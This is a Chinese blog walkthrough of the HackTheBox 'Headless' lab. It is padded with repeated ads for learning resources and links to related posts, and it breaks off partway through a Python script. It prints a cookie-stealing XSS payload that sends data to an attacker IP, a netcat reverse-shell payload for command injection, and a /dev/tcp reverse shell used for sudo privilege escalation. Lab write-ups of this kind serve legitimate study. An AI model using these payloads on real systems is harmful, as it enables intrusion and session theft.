HackThebox Headless(1)

最新推荐文章于 2024-11-02 10:33:10 发布
最新推荐文章于 2024-11-02 10:33:10 发布
阅读量348 收藏 10
点赞数 3
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264662/article/details/138968924
版权

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

support可以发送邮件(存在waf,有过滤),dashboard需要认证

漏洞利用

XSS获取admin cookie
请求头xss注入
(需要被过滤,才会将恶意信息发送给管理员)
在这里插入图片描述

<img src=x οnerrοr=fetch('http://Your_IP/'+document.cookie);/>
# 攻击机上需要开启web服务
sudo php -S 0.0.0.0:80   # 使用python也可

在这里插入图片描述

管理员Cookie: ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
访问dashboard,将Cookie的值修改为ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
存在命令注入漏洞
在这里插入图片描述

反弹shell,payload(已进行url编码如下

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+Your_IP+4444+>/tmp/f

提权

sudo -l

dvir@headless:~$ sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass,
    secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

/usr/bin/syscheck是一个shell脚本

#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last\_modified\_time=$(/usr/bin/find /boot -name 'vmlinuz\*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted\_time=$(/usr/bin/date -d "@$last\_modified\_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted\_time"

disk\_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk\_space"

load\_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load\_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0

./initdb.sh 2>/dev/null执行当前目录下的initdb.sh文件
创建文件initdb.sh,可以进行反弹shell

#!/bin/bash
/bin/bash -i >& /dev/tcp/YOUR_IP/4445 0>&1
# 攻击机监听
nc -lvnp 4445

或者给bash赋予suid权限,然后运行/bin/bash -p

提权后

系统定时运行下述的python代码

#!/usr/bin/python3

import os
# import requests
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.service import Service

def extract_number(filename):
    return os.path.splitext(filename)[0]

options = webdriver.FirefoxOptions()
options.add_argument('--headless')
driver = webdriver.Firefox(options=options)
driver.set_page_load_timeout(5)

while True:
    login_url = "http://localhost:5000/"

    html_directory = "./hacking\_reports"

    html_files = [f for f in os.listdir(html_directory) if f.endswith(".html")]

    base_url = "http://localhost:5000/hacking\_reports/"

    for html\_file in html_files:
        number = extract_number(html_file)
        url = base_url + number

        print(f"Trying: {url}")

        try:
            driver.get(login_url)
            driver.get(url)


### 给大家的福利


**零基础入门**


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限,仅展示部分资料


网络安全面试题


![](https://img-blog.csdnimg.cn/img_convert/80674985176a4889f7bb130756893764.png)


绿盟护网行动


![](https://img-blog.csdnimg.cn/img_convert/9f3395407120bb0e1b5bf17bb6b6c743.png)


还有大家最喜欢的黑客技术


![](https://img-blog.csdnimg.cn/img_convert/5912337446dee53639406fead3d3f03c.jpeg)


**网络安全源码合集+工具包**


![](https://img-blog.csdnimg.cn/img_convert/5072ce807750c7ec721c2501c29cb7d5.png)


![](https://img-blog.csdnimg.cn/img_convert/4a5f4281817dc4613353c120c9543810.png)

**所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**



**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**


**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84264662
关注
专栏目录
Hack The Box - Headless
2401_83831037的博客
03-27 504
使用nmap查看端口情况 nmap -sC -sV -o 10.10.11.8 10.10.11.8 -T20发现5000的网站。
HackThebox Headless
Che_ng的博客
03-25 523
XSS,命令注入。
hack the box(HTB) 的headless详细新手0基础wp
weixin_51439723的博客
04-13 527
①拿到ip后先用nmap看开放的端口可以看到5000端口有http信息比较可疑,直接用dirsearch扫一下:其中中support是试图直接在这里获得信息但是没什么回显另一个进不去,/dashboard显示那么很有可能是需要拿到授权才能进来这个页面现在我们把关注点在再放到/support上。
Hack The Box-Headless
分享
03-27 704
Hack The Box-Headless 。。。该服务器存在xss和RCE漏洞!很简单,没有难度!
HackTheBox--Headless
七天
07-08 462
Headless测试过程。
HackThebox Headless网络安全开发知识点
04-07 744
管理员Cookie:访问dashboard,将Cookie的值修改为存在命令注入漏洞反弹shell,payload(已进行url编码如下。
Hack The Box-MagicGardens
m0_52742680的博客
05-21 4793
HackTheBox S5赛季靶场第五篇
Hack The Box——ScriptKiddie
热门推荐
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
hackthebox Mailroom Hard难度 抄wp复现
qq_29060627的博客
04-30 2869
如上得知: 密码库的密码是:
headless-chrome-crawler:由Headless Chrome驱动的分布式搜寻器
01-30
无头Chrome履带 | | | 由无头Chrome驱动的分布式搜寻器 产品特点 ... 但是,有时它最终会捕获空的主体,尤其是当网站建立在 , 和类...const HCCrawler = require ( 'headless-chrome-crawler' ) ; ( async ( ) => { con
Chrome无头模式–headless1
08-08
1. 打开浏览器: 使用 webdriver.Chrome() 函数创建浏览器对象,即可打开浏览器。 ``` from selenium import webdriver driver = webdriver.Chrome() ``` 2. 访问指定 URL: 使用 get() 方法访问指定 URL。 ```...
java-11-openjdk-headless-11.0.8.10-1.el7.x86_64.rpm
12-01
安装包,亲测可用
在Java SE上使用Headless模式的超级指南
09-03
1. 当尝试在Headless环境中创建依赖于显示设备的组件时,务必捕获并处理`HeadlessException`。 2. 了解如何创建和配置无头的GraphicsDevice和GraphicsConfiguration对象,以便在Headless模式下进行图形绘制。 3. 在...
chrome-headless-travis-build:持续构建chrome headless shell和docker image
01-31
chrome-headless-travis-build:持续构建chrome headless shell和docker image
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8530
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
10-29 1678
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1175
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
“微软蓝屏”事件暴露了网络安全哪些问题?
最新发布
weixin_44626085的博客
11-02 494
想象一下:一天下午,突然间,整个公司内部的电脑开始崩溃,员工们面面相觑,屏幕上闪烁着蓝色的“死机”提示。根据光明网的报道,这正是在2024年7月19日所发生的事情。全球大量Windows用户遭遇了电脑崩溃、蓝屏死机和无法重启的情况,这场技术风暴迅速冲上了微博热搜第一。你可能会想,这究竟是怎么发生的?此次事件的根源在于网络安全公司“众击”(CrowdStrike)的一次技术更新失误,他们的防病毒软件中含有致命错误。这一错误直接导致了Windows系统的崩溃,形成了大家熟知的“蓝屏死机”。
Java SE Headless模式深度指南:无界面操作实战
在Java SE环境中,Headless模式是一种特殊配置,允许应用程序在没有显示屏幕、键盘或鼠标的情况下运行,这对于需要在后台进行大量图形处理或者需要在不具备传统输入输出设备的环境中操作的场景非常有用。本文将深入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值